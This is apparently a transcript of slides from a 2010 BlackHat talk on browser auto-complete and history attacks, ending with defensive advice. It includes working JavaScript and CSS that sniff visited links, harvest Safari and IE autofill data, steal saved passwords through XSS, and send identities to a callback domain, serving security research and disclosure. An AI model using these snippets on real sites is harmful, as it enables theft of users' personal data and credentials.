Breaking Browsers: Hacking Auto-Complete (BlackHat USA 2010)

transcript

Breaking Browsers: Hacking Auto-CompleteJeremiah GrossmanFounder & Chief Technology Officer

Blog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: jeremiah@whitehatsec.com special thanks to:

Robert “RSnake” Hansen (SecTheory)Daniel Veditz (Mozilla)Microsoft Security Response CenterMike Bailey (MAD Security)Chris Evans (Google)

• WhiteHat Security Founder & Chief Technology Officer

• 2010 RSA Security Bloggers Award (Best Corporate Blog)

• InfoWorld's CTO Top 25 (2007)

• 5th most popular “Jeremiah” according to Google

• Brazilian Jiu-Jitsu Brown Belt

• Narcissistic Vulnerability Pimp

• Former Yahoo! information security officer

Web Security

Browser SecurityWebsite Security

2,000+ websites

Global Internet: 1.67 Billion People

Internet

1.67 billion peoplehttp://en.wikipedia.org/wiki/Global_Internet_usage

206 millionwebsites

Largest Market-share

Exploiting Features Enabled by Default

Bonus for Design Flaws

What the “bad guys” target...

July, 2010http://www.netmarketshare.com/browser-market-share.aspx?qprid=2

Browser Version Market Share

By the numbers, of people

IE 8 IE 6 FF 3.5/3.6 IE 7 Chrome Safari 4/5

491 Million

284 Million

351 Million

197 Million

103 Million

83 Million

36 Mil307 Mil

Sandboxes, code security, memory protection, black-lists, green URL bars, anti-phishing, SSL warnings, etc.

Security Features

I know where you’ve been... (on the way out)

FF 3.7 Nightlies Safari v5

http://blog.mozilla.com/security/2010/03/31/plugging-the-css-history-leak/http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

VisitedUnvisited

a:visited#link { background: url('/capture.cgi?http://bank/'); }

Classic CSS History Hack

var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");

In the “visited” pseudo-class, everything except color style properties are ignored.

getComputedStyle lies and returns the “unvisited” link values.

We often still know where you are logged-in, but that’s another discussion.

CSRF Login-Detection

I want to know your name, who you work for, where you live, your email address, etc.Right at the moment you a visit a website. Even if you’ve never been there before, let alone entered information.

Safari Address Book Autofill (enabled by default)

Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE.

Step 1) Dynamically create input fields with the pre-set attribute names.

Step 2) Cycle through the alphabet initiating text events until a form value populates.

Step 3) Profit! -- Steal data with JavaScript.

var event = document.createEvent('TextEvent');event.initTextEvent('textInput', 1, 1, null, char);

input.value = "";input.selectionStart = 0;input.selectionEnd = 0;input.focus();input.dispatchEvent(event);!!setTimeout(function() { if (input.value.length > 1) { // capture the value; }}, 500);

Safari v4 / v5

*transparency is even more fun!*

What about stealing other auto-fill data, data that was previously entered?

Internet Explorer 8 = SAFE

AutoComplete: User-supplied form values are shared across different websites by attribute “name”. For example, email addresses entered into a field on website A populates the autofill for the same field name on website B, C, D, etc.

DEMO - Down, Down, Enter// hit down arrow an incrementing number of times.// separate with time to allow the GUI to keep pacefor (var i = 1; i <= downs; i++) { time += 30; // time padding keyStroke(this, 40, time); // down button}! !time += 15; // time paddingkeyStroke(this, 13, time); // enter button

// initiate keystroke on a given objectfunction keyStroke(obj, code, t) { //create new event and fire var e = document.createEventObject(); e.keyCode = code; setTimeout(function() {obj.fireEvent("onkeydown", e); }, t);} // end keyStroke

Security Basis, and an Internet Explorer data stealerhttp://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.htmlAndrea Giammarchi, Ajaxian Staff

Search termsCredit card numbers and CCVsAliasesContact informationAnswers to secret questionsUsernamesEmail addresses...

AutoComplete is NOT enabled by default, but Internet Explorer asks if the user if they would like to enable the feature after filling out a non-password form.

Sometimes we can’t read auto-complete, but we can write to it (a lot)!

https://bugzilla.mozilla.org/show_bug.cgi?id=578879

Have the email address, but need the password

Remember Password

Many Web Browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis.

<form method="post" action="/">E-Mail: <input type="text" name="email"><br />Password: <input type="password" name="pass"><br /><input type="submit" value="Login"></form>

function stealCreds() { var string = "E-Mail: " + document.getElementById("u").value; string += "\nPassword: " + document.getElementById("p").value; return string;}document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>');

setTimeout('alert(stealCreds())', 2000);

If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which executes the browser’s password auto-complete feature. Since the payload is on the same domain the username / password can be stolen.

DEMO**

Hidden Firefox Protection

about:config

signon.autofillForms

Long-term problem, even when “fixed”

Mass distribute auto-complete code (ad network), cookie affected users with a unique ID, and setup a callback Web service.

DOMAIN: whoisthispersonvar person = {name: ‘name’,email: ‘name’,}

identify(person);

DOMAIN: website<script>function identify (person) {...}</script><script src=”http://iknowyourname.com/?cb=identify”>

Need help deleting your cookies?

the users way...

Firefox: Global 3,000 cookie max cap. 50 cookies can be set per hostname. Therefore, we need 1 domain with 60 subdomains.

https://bugzilla.mozilla.org/show_bug.cgi?id=321624http://kuza55.blogspot.com/2008/02/understanding-cookie-security.htmlhttp://www.nczonline.net/blog/2008/05/17/browser-cookie-restrictions/

P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT";Set-Cookie: cNAME_1=_cValue_1;Set-Cookie: cNAME_2=_cValue_2;Set-Cookie: cNAME_3=_cValue_3;...

The Hackers Way - (Cookie Exhaustion)

$300 dollar hack

Disable Auto-Complete in the Web browser

Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.)

NoScript (Firefox Extension), 1Password, etc.

What to do...

Jeremiah GrossmanFounder & Chief Technology Officer

Blog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: jeremiah@whitehatsec.com

Questions?